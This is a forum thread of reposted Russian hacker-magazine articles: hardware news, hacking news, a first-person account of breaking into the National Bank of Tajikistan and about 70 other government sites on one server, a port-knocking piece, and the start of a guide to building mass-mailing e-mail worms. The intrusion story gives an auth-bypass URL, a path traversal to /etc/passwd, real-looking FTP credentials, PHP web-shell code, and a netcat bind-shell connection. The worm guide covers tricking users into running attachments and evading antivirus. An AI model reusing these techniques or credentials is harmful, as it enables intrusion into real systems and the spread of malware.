Не стоит забывать, что все действия взломщиков противозаконны и эта статья предназначена лишь для ознакомления. За применение материала в незаконных целях автор и редакция ответственности не несут.

CD

На нашем диске ты найдешь все упомянутые в статье утилиты, плагины к OllyDBG, а также коллекцию crackmes от fant0m’а.

WARNING

Перед чтением статьи я настоятельно советую прочитать статьи из «Кодинга», посвященные ассемблеру. Это существенно облегчит и ускорит понимание материала.

INFO

В W32Dasm’е могут быть проблемы со шрифтами. Для устранения проблемы выбери меню Disassembler -> Font -> Select Font и установи шрифт Courier (полужирный, размер 8). После этого настройки нужно сохранить: меню Disassembler -> Font -> Save Default Font.




Автор: Metallica Dec 10 2006, 16:40

В сложенном состоянии габариты нового мышака составляют 9,52x5,71x4,3 см, а весит грызун 60 г. После раскладывания мыши ее шасси поднимается на 7 градусов и фиксируется в таком положении. В шасси интегрирован слот для 2,4 ГГц приемника с интерфейсом USB, размеры которого составляют 1,42x5,08x0,63 см. Новинка произведена по фирменной и очень крутой, как говорят в пресс-релизе, технологии Logitech, что позволяет работать с мышью даже на расстоянии 9 м от компьютера, при этом никакая злодейская Wi-Fi-сеть или вражеский жучок не помешают тебе уверенно водить курсором по экрану, разглядывая его в бинокль.

В рознице V500 Cordless Notebook Mouse появится уже очень скоро, при этом покупать новинку дороже $70 производитель категорически не советует.

Тоненький резак

Toshiba Storage Device Division, отдел устройств для хранения данных Toshiba, сообщил о выпуске и начале продаж оптического привода SD-R6472, поддерживающего запись на DVD-/+R/RW. Новинка предназначена для работы в ноутбуках, поэтому очень тоненькая и весит всего-навсего 0,19 кг.

Вот основные спецификации Toshiba SD-R6472:

* Скорость записи: DVD+/-R – 8x, DVD+/-RW - 4X, CD-R - 24x, CD-RW - 10x

* Скорость чтения: DVD-ROM - 8x, CD-ROM - 24x

* Размеры: 128х12,7x126,1 мм

* Вес: 0,19 кг

Системная плата

Недавно на сайте Gigabyte появился новый пресс-релиз, анонсирующий выход системной платы P4 Titan GA-8TRX330-L. Новая мать работает на наборе логики от ATI - RX330. Вот тебе краткие характеристики новинки:

* Чипсет: ATI RX330 + SB300

* Процессор: Intel Pentium 4 с 800/533/400 МГц FSB, Hyper-Threading

* Двухканальный контроллер DDR400/333/266 памяти, 4 разъема DIMM, поддерживается до 4 Гб

* Serial ATA: 2xSATA/2xPATA

* Графический интерфейс: AGP 8X/4Х

* Интегрированный адаптер Ethernet 10/100 Мбит/с

* 5.1-канальный AC’97 аудиокодек

* 8 портов USB 2.0

* 5 разъемов PCI

* Форм-фактор: ATX

Мама геймера

Как и было обещано в июне этого високосного года менеджерами компании Abit, компания представила, наконец, новую системную плату Fatal1ty AA8, которая предназначена и ориентирована специально для использования в игровых системах high end. По сообщениям ряда информационных сайтов, в массовое производство эта забавная мама была запущена 15 октября, а значит, ты уже можешь найти ее на полках магазинов. Однако прежде тебе, конечно, хочется почитать ее характеристики. Получай:

* Процессор: Intel Pentium 4 LGA775

* Форм-фактор: ATX (305x245 мм)

* Чипсет: Intel 925, южный мост ICH6R

* Четыре разъема DIMM (240 выводов, unbuffered, non-ECC), поддерживается двухканальный режим, DDR2-533/400 МГц, до 4 Гб

* Интегрированный контроллер RAID Intel Matrix, 4 порта Serial ATA, RAID 0/1, SATA AHCI

* 7.1-канальный Intel high-def аудиокодек, оптический S/PDIF-выход

* PCI Express (PCIe)?16

* Сетевой адаптер GbE (Gigabit) LAN 10/100/1000 Мбит/с Ethernet

* Прочие интерфейсы: 2 x PCIe ?1, 2 x PCI, 1 x UltraDMA 100/66/33, 6 x USB 2.0, 3 x IEEE 139

Умный Wi-Fi

Три новых устройства для домашних Wi-Fi-сетей представила компания D-Link. Новинки целиком поддерживают протокол Microsoft Windows Connect Now, при этом, правда, инженеры компании реализовали в решениях для WLAN порт USB 2.0 и предпочитают работать с USB Flash Config. Менеджеры, как это водится, накатали здоровенный пресс-релиз, я же кратко охарактеризую все три устройства.
D-Link DSM-622H – это сетевой диск, устанавливаемый в беспроводной сети и используемый в качестве системы хранения папок с общим доступом. Подключение устройства сети обеспечивается либо по протоколу 802.11g, либо посредством Ethernet-соединения.

MediaLounge Wireless Central Home Storage Drive представлен в двух вариантах: емкостью 20 или 40 Гб. Вот основные характеристики:

* Процессор XScale IXP 420

* Поддерживаемые стандарты: IEEE 802.3 10Base-T Ethernet, IEEE 802.3u 10/100Base-TX Fast Ethernet, ANSI/IEEE 802.3 NWay Auto-Negotiation, IEEE 802.11g Wireless

* Порты: 10/100 WAN Port (MDI/MDIX Auto-Sensing)

* Жесткий диск: 2,5 дюймов, 5400 об/мин, контроллер IDE Ultra DMA 133

* Внешняя антенна с обратным SMA-разъемом

* Управление при помощи web-интерфейса

* Встроенный DHCP-клиент

D-Link DI-624S – маршрутизатор для беспроводных сетей, поддерживает Windows Connect Now и предназначен для работы в сетях стандарта 802.11g. Среди многочисленных возможностей устройства я бы выделил фильтрацию MAC- и IP-адресов, фильтрацию по URL и поддержку VPN. И наконец, о последнем, третьем устройстве. Это D-Link DWL-G710AP – точка доступа, предназначенная для работы в сетях стандарта 802.11g, поддерживает WPA-аутентификацию и может работать как DHCP-сервер.

Красный камень покатился

Небезызвестная компания TwinMOS продолжила линейку своих MP3-плееров Red Rock, представив новинку Red Rock S21. Плеер поставляется в разных цветовых вариантах и поддерживает воспроизведение файлов в форматах MP3, WMA и WAV. Разумеется, не обделена новинка и эквалайзером – к услугам пользователя 5 стандартных пресетов (Classical, Jazz, Rock, Pop, Normal).

Плеер умеет многократно воспроизводить части записи (функция «A-B repeat»), что по задумке инженеров должно способствовать изучению иностранных языков. Как и положено, в новинке реализован FM-тюнер с частотными диапазонами 87,5-108 и 76,0-91,0 МГц, поддерживаются настройки 10 станций. Среди прочих характеристик имеет смысл выделить:

* Интерфейс: USB 2.0 (разъем mini)

* Емкость: 128, 256 и 512 Мб

* Возможность записи радиопередачи

* 8,5 часов непрерывной записи (128 Мб, MSADPCM 8 КГц)

* Возможность модернизации микрокода

* Поддержка ID3-тэгов

* 18,5 часов непрерывного воспроизведения от одной батареи стандарта AAA

* Размеры: 73,6x24x27,8 мм

* Масса: 50 г

Сетевая камера

Специалисты из Linksys, подразделения Cisco Systems, представили недавно сетевую камеру Wireless-G Internet Video Camera (WVC54G), предназначенную для создания систем наблюдения с возможностью мониторинга через браузер. В отличие от других аналогичных вебкамер, WVC54G не требует подключения к ПК – получая собственный IP-адрес у DHCP-сервера, камера может подключаться как к проводной, так и к беспроводной сети. Вот основные возможности новинки:

* Передача видео 640x480, закодированного MPEG-4

* Поддержка WLAN 802.11g

* Порт 10/100 Ethernet

* Встроенный web-сервер

* В режиме безопасности умеет автоматически отправлять по электронной почте уведомления об изменении изображения - движения в кадре в случае системы наблюдения

* Допускается одновременное удаленное подключение до 4 пользователей

* Встроенный микрофон (имеет возможность подключения внешнего)

* Утилита Viewer & Recorder (запись аудио- и видеопотоков, даты и времени события на локальный жесткий диск)

* Поддержка SoloLink Dynamic Domain Name System – слежение за IP-адресом камеры и быстрое восстановление связи в случае его изменения

* Linksys Wireless-G Video Camera доступна в настоящее время, предположительная розничная цена модели – от 200 долларов

Такую штуку можно повесить, например, дома или в гараже перед отъездом из города. Если что-то не в порядке, она скинет тебе сообщение и ты моментально узнаешь об этом.

Японские карты

На японском рынке уже появились графические адаптеры XGI Volari V8, работающие на крутых кристаллах Volari Duo. Собственно, о выпуске этих карт менеджеры компании трубили уже давно, и вот, видимо, это и произошло. Уже сейчас средний японец может запросто купить себе любую из двух версий адаптеров: с 256 Мб графической памяти по цене $120 и с 128 Мб за $105. Разумеется, оба варианта платы используют интерфейс AGP.

Что касается характеристик плат, они следующие. Процесс работает на частоте 350 МГц, память DDR2 – на 450 МГц. Помимо того, что поддерживается HDTV-выход в форматах 480i/480p/1080i/720p, так еще и имеются стандартные выходы DVI-I и VGA.

Мобильный винч

Новый 2,5-дюймовый жесткий диск представили работники Western Digital. Новинка предназначена для использования в портативных ПК и мультимедийных устройствах. Удивительно, но это первый продукт WD для портативных устройств – до настоящего момента менеджеры компании туповато смотрели, как конкуренты борются за рынок малогабаритных накопителей.

Впрочем, в этом году прогнозируется рост поставок 2,5-дюймовых винчестеров почти на 25% (с 47 млн. до 60 млн.), так что компания пришла на рынок вовремя smile.gif. Новые жесткие диски Western Digital, названные WD Scorpio, будут обладать такими вот ТТХ:

* Скорость вращения шпинделя: 5400 об/мин

* Время поиска произвольного сектора: до 12 мс

* Емкость: 40, 60, 80 Гб

* Интерфейс: EIDE

* Объем буфера: 2 Мб (до 8 Мб)

Солнечный кристалл

Пока специалисты AMD и Intel спорят о том, чей двуядерный процессор будет круче, быстрее и холоднее, шустрые немцы из Sun Microsystems взяли да и представили в ходе форума Fall Processor Forum, проводимого In-Stat MDR, следующее поколение своих двуядерных процессоров UltraSPARC IV+.

Новый камень UltraSPARC IV+ стал для инженеров компании воплощением концепции Sun Throughput Computing, высокопроизводительных параллельных вычислений. Вот так вот.

К слову, если кому придет в голову сравнивать процессоры от AMD, Intel и Sun. У разработки немецких специалистов самый большой объем кэш-памяти: 2 Мб кэша второго и 32 Мб кэша третьего уровня. UltraSPARC IV+ выпускается на заводах Texas Instruments с соблюдением норм 90 нм техпроцесса, работает на тактовой частоте 1,8 ГГц и поддерживает технологию Chip Multithreading.

Компактная пятерка

Представительство компании Epson в Северной Америке анонсировало новую небольшую 5-мегапиксельную камеру EPSON L-500V. Новинка поддерживает фирменные технологии Epson Photo Fine и PRINT Image Framer. Вот основные характеристики L-500V:

* Сенсор: ПЗС-матрица (CCD) 5 млн. пикселей

* Дисплей: ЖК, 2,5 дюйма

* Оптическое приближение: 3х

* Цифровой зум: 4х

* Прямая печать: PRINT Image Matching II, Exif 2.2 (Exif Print)

* Носитель: Secure Digital, MMC (MultiMedia Card)

Полагаю, к выходу журнала новинка уже попадет на рынок по цене около $400.

mindw0rk (mindw0rk@gameland.ru)

Арестован самый опасный корейский хакер

У корейской полиции нынче национальный праздник. Нет, не день корейской полиции, а день ареста самого опасного корейского хакера. Самым опасным чувака по имени Ли назвали потому, что за полтора года он умудрился взломать 1152 компьютерные системы. В числе жертв оказались Сеульский национальный университет и Корейский институт передовой науки и технологии. Такое количество серваков не удалось похакать ни одному другому корейскому взломщику. Так что полиции есть с чего радоваться.

А ведь еще недавно, в 2002 году, Ли был добропорядочным корейским гражданином, работал в компании, специализирующейся на обеспечении информационной безопасности, играл в гольф по выходным. Однако решил, что белые воротнички и офисные заморочки не для него. Поэтому уволился и ушел в подполье.

Помимо взломов и дефейсов разных сайтов, хакер увлекался порнушкой. Во время задержания из его квартиры изъяли большую коллекцию порно на любой вкус. Также Ли постоянно занимался рассылкой вирусов и троянов, которые обычно вставлял во вложенную в письмо картинку. Таким образом, ему удавалось собрать неплохую подборку конфиденциальной инфы, которой хакер приторговывал на досуге.

Теперь хакерские будни сменятся судебными. Впрочем, вряд ли Ли грозит долгий срок. В Корее законы относительно компьютерных преступлений еще очень недоработаны.

Краш PayPal

Что такое PayPal, ты наверняка знаешь. Крупнейшая система денежных онлайн переводов, услугами которой пользуются миллионы людей. Понятное дело, над обеспечением ее безопасности и надежности работают не самые глупые люди и вкладываются в это немалые деньги. Но на всякую секурную задницу найдется свой хакерский болт.

8 октября многочисленные пользователи системы обнаружили, что не могут оперировать своими счетами. Конечно, это сразу отразилось на е-шопах и сетевых аукционах, включая eBay. На следующий день вроде все было окей, но потом глюки вернулись. Краш пейпала продлился до 13 октября, все это время сисадмины пытались оживить систему.

Официальная версия представителей PayPal такая: обновлялось ПО, ставились новые патчи, в процессе этого произошел сбой. Но есть и другая, неофициальная версия. Дело в том, что незадолго до краша палки подобные проблемы возникли у другой платежной системы, WorldPay, а еще раньше – у менее известных аналогов. Если пошуршать мозгами, несложно догадаться, что совпадения эти неслучайны, и, скорее всего, ресурсы просто подверглись DOS-атаке.



Автор: Metallica Dec 10 2006, 21:52

Точикистонский косяк

Взлом сайтов национального банка, минфина и Президента Таджикистана

Большинство людей, сталкиваясь с сайтами серьезных организаций вроде национального банка, министерства финансов, Правительства и администрации Президента, сразу бросают глупую идею поломать авторитетный ресурс. Наивные ребята. Тебе остается только радоваться: я не из их числа и расскажу тебе сегодня, как мне удалось взломать самые главные сайты страны, известной своими трудолюбивыми гастарбайтерами и миллиардными наркопотоками, текущими через высокие и красивые горы на север.

[первое знакомство]

Я уже собрался выходить в оффлайн, как вдруг один мой знакомый постучал в асю и попросил посмотреть на странный sql-injection. Перейдя по предоставленному линку, я быстро принялся анализировать явный инжект. Казалось, я все делал правильно, но, по непонятным причинам, желаемого не получал. Я совсем увлекся исследованием бага, и вдруг мой товарищ сказал: «А знаешь, что ты сейчас ломаешь? Загляни на индекс». Перейдя на индексную страницу, я лицезрел гордую надпись: Национальный Банк Таджикистана.

[думаем о здоровье]

В тот же момент я перепроверил свою проксю на анонимность и со спокойной душой принялся анализировать сайт дальше.

Пройдясь по линкам и посмотрев структуру сайта, я ничего интересного не обнаружил. Сайт работал на самописном движке, никаких особых скриптов там не было, акцент был сделан именно на информативность сайта. Из найденных недоработок была разве что та sql-инъекция, которую мне показал приятель, но я не мог ее грамотно заюзать.

Почему-то в голове сразу промелькнула мысль: «Да это же Банк. Здесь не может быть ошибок. Уходить надо отсюда и забыть про все». Хотя постой, как же это так: не может быть ошибок, тут же в скрипте примитивная инъекция! В жизни не бывает случайностей.

Я стал размышлять дальше. Раз сайт часто обновляется и модерируется, думал я, значит, обязательно должна быть админка. Надо попробовать найти ее.

Особо не раздумывая, я ввел в адресную строку браузера http://admin.bank.ru и тут же получил пощечину: такого адреса не существовало. Я тут же исправил адрес на www.nbt.tj/admin и уже приготовился к очередному отказу, как вдруг увидел форму для ввода логина и пароля. Ну, вот уже кое-что. Проверка скрипта авторизации на различные баги ни к чему не привела, все было написано нормально. Либо все вредоносные символы жестоко отфильтровывались, либо авторизация была примитивной, пароль был жестко зашит в теле самого скрипта.

Отчаявшись, я запустил nmap, решив для своего спокойствия просканить сервер: nmap -sV -F www.nbt.tj. Не надеясь на чудо, я узнал, что на сервере открыты стандартные 80, 21, 22 и 3306 порты. Из сервисов были установлены ProFTPD и SSH. К моему сожалению, версии были стабильные, а достать приватные сплоиты для меня не было возможности. Я решил любой ценой прогрызть себе дыру через web.

[свежий взгляд]

Вернувшись на сайт, буквально сразу же я заметил неприглядную кнопочку переключения языка: были доступны русский и английский. Естественно, я не обратил на нее внимание с самого начала, ведь серфить на русском куда привычнее. Я загрузил английскую версию сайта и заметил, что url страницы сменился на www.nbt.tj/en. Наверное, у них просто сохранена точная структура сайта в папке /en. В который раз, пройдясь по линкам английской версии сайта, я убедился, что структура осталась прежней. Стоп! Раз структура сохранилась, значит, должна сохраниться и админка. Каково же было мое удивление, когда, обратившись к www.nbt.tj/en/admin, я увидел, что английская версия админки не была запаролена! Чем это объяснить? Тут можно только гадать, так как никто не подозревал, что ей будут пользоваться, ведь, скорее всего, сайтом управляют русскоязычные сотрудники, или же это просто критический недочет web-мастера. Но сейчас это не главное, сейчас я внутри. Интерес сильнее осторожности smile.gif.
[косяк админа]

С первых же секунд я принялся изучать возможности, доступные из админки. Первые несколько пунктов несли разочарование - из функций были лишь просмотр и редактирование статей, размещенных на сайте. Моя попытка исполнить php-скрипт в теле статьи не увенчалась успехом - я лишь увидел его исходный код. Можно было бы поставить снифер и попытаться поймать сессию админа, но что бы это дало? Я сомневался, что возможности русифицированной админки больше, чем английской.

Дальше - больше: раздел Files - просмотр архива всех статей и загрузка файлов. Все - вот оно. Нетерпеливо кликнув по ссылке для перехода к файл-менеджеру, я вновь получил отказ. Мне вежливо предложили залогиниться и даже уже вписали за меня логин: nbtjftp. Теперь оставалось угадать пароль, и я практически получаю веб-шелл.

Пара отчаянных попыток отгадать пароль с лета не увенчались успехом. Я остановился и начал соображать: сообщение над строкой формы логина гласило: Simple File Manager - Login.

В тот же момент я обратился к багтракам. Не один из них не знал такого скрипта и не содержал упоминаний как о данной версии, так и о предыдущих релизах. Мои надежды на удачный взлом таяли с каждой минутой, от безысходности я вновь вернулся к авторизации.

В правом нижнем углу был линк на сайт разработчика, откуда впоследствии я скачал исходники скрипта. Автор распространял его бесплатно, и, что самое интересное, он был еще в стадии альфа тестирования, а значит, шансы на то, что скрипт содержит недоработки, резко увеличивались. Я решил искать уязвимости сам.

[кодерский косяк]

Решив, для начала, ознакомиться с принципом работы скрипта и посмотреть, какие возможности кроются внутри, я залил его на свой сервер и залогинился под известным мне аккаунтом, предлагаемым разработчиком для тестирования: guest:demo. Данные о пользователе хранились в самом скрипте fm.php. Полазав по своим папкам, я нажал пимпу logout и вернулся к процессу авторизации. Вот что я заметил, проделав операцию логина еще раз: данные о пользователе передавались скрипту методом POST в переменных $user и $password. Если авторизация прошла успешно, то скрипт пропускал меня внутрь. Что самое интересное, в адресной строке после этого добавлялась переменная $u=guest. Таким образом, скрипт следил за тем, какой пользователь залогинен в данный момент. Если поменять значение переменной $u, то скрипт заругается и отправит меня к форме авторизации. Так вот же она моя бага, подумал я! Сделав логаут, я вновь очутился перед окошком ввода логина и пасса, только на этот раз я сообщил скрипту переменную $u, содержащую мой логин, который, кстати, автоматически прописывается в поле формы. После обновления страницы я добился того, чего хотел: авторизация была успешно обманута. Посмотрев исходники скрипта, я лишь только убедился в своей правоте: скрипт давал возможность редактировать переменную $u, которая была как бы флагом авторизации посредством GET запроса:
if (isset($_REQUEST['u'])) { $u = $_REQUEST['u']; }

else { $u = ""; }

Эта строчка и позволяла мне беспрепятственно изменить значение переменной, объявив скрипту, что я честно прошел процедуру авторизации и мне можно доверять. Критическая ошибка программиста-утырка сыграла мне на руку!

Уверенный в своей удаче, я решил наконец-таки разобраться с сайтом банка до конца.

Перейдя к файл-менеджеру по адресу www.nbt.tj/en/files/fm.php, я очутился перед знакомым окошком. Как и полагается, логин пользователя был уже прописан в своем поле, а это все, что мне было нужно. Я быстро переправил урл на www.nbt.tj/en/files/fm.php?u=nbtjftp и скрипт с удовольствием авторизировал меня.

[сплошной read only]

Каково же было мое разочарование, когда я обнаружил, что права на создание и редактирование файлов скрипт не предоставляет, также отсутствуют права на аплоад файлов на сервер. В общем, сплошной read only sad.gif. Рабочая директория была ограничена: скрипт отказывался подниматься уровнем выше, и были доступны только корневая папка, где и был проинсталлирован скрипт, причем хитрый автор запрограммировал его скрывать самого себя от глаз пользователя. Одним словом, я увидел совсем не то, что ожидал. И с этим надо было как-то бороться.

Наученный опытом подделки переменной $u, я тщательно следил за структурой урла и переменных, которые передаются скрипту. Мое подозрение пало на процесс просмотра файла, когда через переменную edit скрипту передавалось имя файла, указанного пользователем. Хм, а что если передать переменной что-то типа ../../../../../../../../etc/passwd? Таким образом, исправив урл на

www.nbt.tj/en/file/fm.php?u=nbtjftp&edit=../../../../../../../../etc/passwd&copt=1, я смог просматривать любые файлы на сервере, которые были доступны моему пользователю. Я решил посмотреть исходник скрипта, для чего задал значение переменной $edit, равное fm.php. Как я и ожидал, внутри сорца были жестко прописаны админские реквизиты: nbtjftp:ftpnb02.

После этого произошло самое ужасное: я задался извечным русским вопросом «что делать?». Мне хотелось намного большего, чем просто просмотр файлов, а свежих идей в голове практически не оставалось.

[сервер изнутри]

Решив немного отвлечься, я принялся читать авторское описание скрипта. Разработчик писал: «данный скрипт создан как альтернатива FTP и предназначен для людей, у которых нет возможности пользоваться фтп, или им по каким-то причинам отказано в доступе». Ну конечно, фтп! Вопреки всей логике автора программы я попытался залогиниться на фтпшник с добытыми логином и пассом, и, что самое удивительное, меня пропустили - вот он, доступ. На скорую руку я настрочил следующий код:
<?

echo "<pre>";

passthru($_GET['cmd']);

echo "</pre>";

?>

Выбрав неприметную директорию на сервере, я залил свой скрипт под именем search.php, чтобы тот не сильно выделялся среди других файлов. Сюда же я залил и bind.pl - бинд-шелл на перле со стандартными настройками бинда на 32767-ом порту. Забиндив для себя порт, со своего веб-шелла командой perl bind.pl, я приконнектился netcat'ом к серву:

nc.exe www.nbt.tj 32767

Играем дальше. Первым делом я узнал, кто еще пользуется системой в данный момент, и последние подключения:

who;

last -10;

К счастью, админов на месте не было, и я работал с машиной один. Дальше я выяснил свои права и операционку, установленную на сервере:

id; uname -a;

Оказалось, что я работал из-под юзера apache, а сервачок крутился под управлением gentoo c ядром 2.6.11. К сожалению, рута здесь взять не получится, хотя чего еще я ожидал здесь увидеть? Оставшись без рутового шелла, я принялся исследовать сервер дальше. Просмотрев папку htdocs, я с удивлением обнаружил, что на этом сервачке хостится еще около 70 сайтов, среди которых были замечены проекты Министерства Иностранных Дел, Министерства Финансов, Сайт Президента, еще несколько банков, интернет-провайдер, телевидение и газета. В общем, весь Таджикистанский хай-тек поместился на одном сервере, который из-за админов-наркоманов вскоре позволил мне получить полный доступ ко всем сайтам, включая ресурс Президента республики Точикистон smile.gif. Я вот до сих пор сдерживаю себя от того, чтобы поменять фотографию Президента на свою smile.gif.

[по порядку]

Однако не будем забегать вперед, расскажу все по порядку. Размышляя над тем, как лихо мне удалось получить доступ к FTP, я пришел к выводу, что для каждого сайта сделана своя учетная запись и каждому ресурсу позволено юзать FTP. Вспомнив логи nmap, я узнал, что на серве установлен ProFTPD. Я решил найти конфиги этого сервиса и посмотреть, какие учетные записи там есть. Для этого я выполнил следующую команду:

# find / -type f -name "proftpd*";

Среди найденных файлов, есть то, что мне нужно, - это файлик /etc/proftpd/proftpd.conf. Просмотрев его, я просто обомлел. Никогда еще такого не видел. В заголовке каждого блочка с описанием ftp-пользователя в комментарии был прописан ПАРОЛЬ этого юзера! Например, описание логина с говорящим названием president.tj выглядело так:

# president.tj

# p:SomonTj

User president

Group users

MaxClients 10

AnonRequirePassword on

RequireValidShell off

AllowOverwrite on

Получив доступ ко всем ftp-аккаунта на сервере, я решил продолжить свои изыскания. Покопавшись в различных скриптах, я выудил несколько mysql-аккаунтов. Однако, вопреки ожиданиям, в базах данных я не нашел никаких сведений о маршрутах поставок гашиша, оружия и перевозки иммигрантов; все, что было в базе, - это тексты публикаций и прочий мусор. Хотя в БД одного банка, я обнаружил нечто похожее на систему авторизации. На их сайте же, я прочитал, что они вскоре планируют открыть сервис онлайн-банкинга. Ну вот, сервис еще не открыли, а доступ уже есть smile.gif.
[вместо заключения]

Все просто элементарно. За несколько часов работы я поимел все онлайн-представительства целой страны. Возможно, некоторые скажут, что взлом во многом примитивен: пустой пароль в скрытой админке, элементарный баг воспаленного программерского мозга, маразматичное решение администратора записать пароли пользователей в комментариях конфига ftp-сервера. Однако такое положение дел во многом показательно, не следует думать, что такое «разгвоздяйство» - единичный случай. Многие администраторы, особенно на пост-советском пространстве, относятся к возможности взлома, как к чему-то сверхъестественному, что происходит с кем угодно, но только не с ними.

Как показал мой пример, внедряя хай-тек, нужно быть очень осторожным. А то получится такой же косяк, как и у точикистонцев smile.gif.

Полезные ссылки

* Утилита Netcat, без которой не обходится ни один взлом: http://cesnet.dl.sourceforge.net/sourceforge/netcat/netcat-0.7.1.tar.gz

* Популярный сканер Nmap: www.insecure.org/nmap/nmap_download.html

* Бажный скрипт Simple File Manager с идиотской дыркой, благодаря которой я поимел все серверы Таджикистана: http://sourceforge.net/project/showfiles.php?group_id=60333

* bind.pl - перловый скрипт, биднящий шелл на указанном порту: www.oak.hu/avatar/bind.pl

Бажный движок

На взломанном сайте использовался движок Simple File Manager, который можно скачать по адресу http://sourceforge.net/project/showfiles.php?group_id=60333. В скрипте допущена идиотская ошибка, которую мог сделать только школьник 9 лет. После авторизации пользователя в качестве флага, обозначающего тот факт, что он ввел корректный пароль, скрипту передается GET-переменная u, указывающая логин, под которым вошел пользователь. Таким образом, для авторизации достаточно лишь подставить требуемый логин в эту переменную. Это уже само по себе жесткий баг, но еще хуже становится от того факта, что скрипт сам сообщает взломщику требуемый логин: он подставляет его в форму авторизации. Придурошный ход для сомнительного повышения usability обернулся жестким багом.

WARNING

Следует понимать, что все, что я проделал - это противозаконно. Эта статья дана лишь для ознакомления и организации эффективной защиты. За применение материала в незаконных целях, несешь ответственность только ты сам. Соблюдай законы своей страны.

CD/DVD

На нашем диске ты найдешь все программы, описанные в статье, а также видеоиллюстрацию к этому взлому. Чтобы всякие утырки не говорили, что все это мы придумали сами.









Автор: Metallica Dec 10 2006, 22:38

Intro

Новый год уже совсем близко. Тебе дается возможность прекрасно потратить время в размере 10 дней, данное тебе свыше. Провести время с близкими и друзьями, потому что, опять же, так тебе сказали свыше smile.gif. Ведь самостоятельно придумать повод для праздника население нашего государства вряд ли сможет. Поэтому это придумали за нас. Чтобы нас всех объединить и дать нам возможность по-настоящему повеселиться хоть раз в году.

А тебе ведь, в принципе, ничего не мешает устроить себе праздники, отдыхать с приятными тебе людьми? Мешает? Тогда стоит призадуматься. Не мешает? Ну тогда все хорошо.

Итак, Новый год. Что тебе нужно сделать? Правильно, купить елку! А что потом необходимо с ней сделать? Правильно, нарядить! А еще что нужно сделать перед Новым годом? Правильно, купить подарки друзьям и близким. Что ж, алгоритм программы давно запрограммирован. Осталось только нажать кнопочку start. Жми ее. С наступающим тебя Новым годом smile.gif.

Port Knocking. Новый фокус от админов в действии

Сканирование портов - излюбленный прием сетевых взломщиков. С его помощью можно легко определить активные сервисы, выяснить названия и версии используемого софта, после чего попытаться найти подходящий эксплойт. Иногда сканер портов показывает фигу и говорит, что на удаленной машине открытых портов нет. Конечно, работающих сервисов может действительно не быть, но возможен и другой вариант - администратор использует прием Port Knocking.

[порт - что?]

«Порт нокинг» - это особая технология передачи данных. Для того чтобы лучше ее понять, вспомни азбуку Морзе и конкретно обозначение слова SOS. Сигнал бедствия передается с помощью комбинации - три точки, три тире, три точки. Три точки, соответственно, обозначает букву S, а три тире - букву O. Для всех остальных символов также существуют аналогичные обозначения. Таким образом, общий принцип очень прост: с помощью последовательностей точек и тире можно представить любую букву, а соответственно, слово и текст. Технология Port Knocking использует очень схожий принцип. Разница лишь в том, что для кодирования информации применяются не точки и тире, а серии попыток подключения к закрытым портам. Зачем это нужно? Для многого.

Возьму сразу распространенный и банальный пример. Если клиенту заранее известна секретная последовательность подключений, то он может подключиться даже к тому серверу, у которого открытые порты внешне отсутствуют. Скажем, если бы я хотел приконнектиться к взломанному серверу через SSH, то сконструировал такой бэкдор, который не использует напрямую 22 или любой другой порт. Такой подход сразу же вызовет подозрения у любого опытного администратора. Лучше сделать так, чтобы бэкдор определял попытки подключения последовательно на 1011, 1007, 1033, 1002, 1000 порты, после чего открывал доступ к SSH-порту на несколько секунд. Этих секунд будет вполне достаточно, чтобы подключиться и комфортно работать в системе.

Последовательность попыток подключения к закрытым портам называется Knock (тук-тук!). Несмотря на то, что все порты на сервере закрыты, все попытки непрерывно отслеживаются, и информация о них записываются в логи файрвола. Сервер чаще всего никак не отвечает на эти подключения, но он считывает и обрабатывает их. Если серия подключений обозначена в настройках специального Port Knock демона, на сервере тут же выполнится определенное действие. В большинстве случаев открываются несколько портов, например, 22 - для возможности подключения администратора к SSH-сервису. Но это лишь один из вариантов. Триггер может совершенно по-разному реагировать на правильный «тук-тук!» и не только динамически изменять правила файрвола, а еще выполнять любые другие административные действия (скажем, выполнять перезагрузку системы, отключение питания и т.п.). Что касается выбора Knock'ов, то он произволен и зависит исключительно от разработчика. Единственное условие - последовательность подключений (или алгоритм ее составления) должна быть заранее известна как для серверной, так и клиентской стороны.




Автор: Metallica Dec 11 2006, 20:22

Разводим червей


Что такое мыльные черви, и с чем их едят

Такое явление как массовое распространение червей в Сети коснулась, думаю, любого. Наверняка ты уже знаешь таких сетевых представителей беспозвоночных, как Beagle и MyDoom, они заразили сотни тысяч машин и наделали немало шума. Может быть, ты думаешь, что сделать самому подобного зверя очень трудно? Это не так, мыльный червь на самом деле не представляет собой ничего сложного. И в этой статье я это попытаюсь доказать, рассказав тебе о принципах функционирования мыльных червей и об особенностях их реализации. Но хочу тебя сразу предостеречь, что черви чрезвычайно опасны, поэтому обращаться с ними надо со всей осторожностью, иначе можно наделать бед и загреметь за решетку. Так что все написанное в этой статье следует использовать только в учебных целях. В общем, начинаем разводить червей.

[как работает червь?]

Общий принцип работы всех мыльных червей - это рассылка писем, в аттачах которых находится копия червя, предназначенная юзеру. Наверно, ты думаешь, что это вздор, аттачи сейчас никто не запускает. Однако статистика говорит, что приложения в сомнительных письмах запускает 2-3% пользователей, а этого вполне достаточно для успешного распространения червей. После запуска червь каким-либо образом прописывает себя в автозагрузку. Следующим этапом работы червя является поиск всех e-mail адресов на зараженной машине, они извлекаются из адресной книги Outlook (либо других почтовых программ) и ищутся в html-, txt- и doc-файлах по всем дискам зараженной машины. Третьим этапом жизни червя является рассылка себя по всем найденным адресам. Все это с первого взгляда кажется примитивным, но на всех этапах есть множество важных тонкостей, которые нужно обязательно учесть для того, чтобы червь стал жизнеспособным. Необходимо заставить сервер принять письмо, а пользователя запустить в аттач. Нетривиальной также будет борьба с антивирусами, спамфильтрами почтовых систем, файрволами и различными фильтрами аттачей в mail-клиентах. Короче говоря, проблем у червеписателей хватает. Итак, приступим к рассмотрению всех этапов жизни червя по порядку.

Начнем с самого важного, по моему мнению, вопроса, который возникает при создании червя - как заставить юзера запустить аттач? В первую очередь нужно обойти проблемы технического характера, главной из которых может быть запрет открытия исполняемых файлов почтовой программой. Уже давно прошли времена, когда можно было смело посылать на мыло exe-файл и надеяться, что пользователь его запустит. Сейчас даже самый тупой юзер (на которого и рассчитаны мыльные черви) не запустит такой аттач по той причине, что ему не даст это сделать почтовая программа, либо письмо будет удалено фильтром вложений файрвола. Первое, что приходит на ум - это засунуть исполняемый файл в архив. Почтовые фильтры не рискнут удалять такие аттачи, а юзеру нетрудно будет открыть такой архив и запустить файл. Если на архив также поставить пароль и записать его в тексте письма, то будут пасовать и антивирусы на почтовых серверах, однако процент заражений несколько снизится.

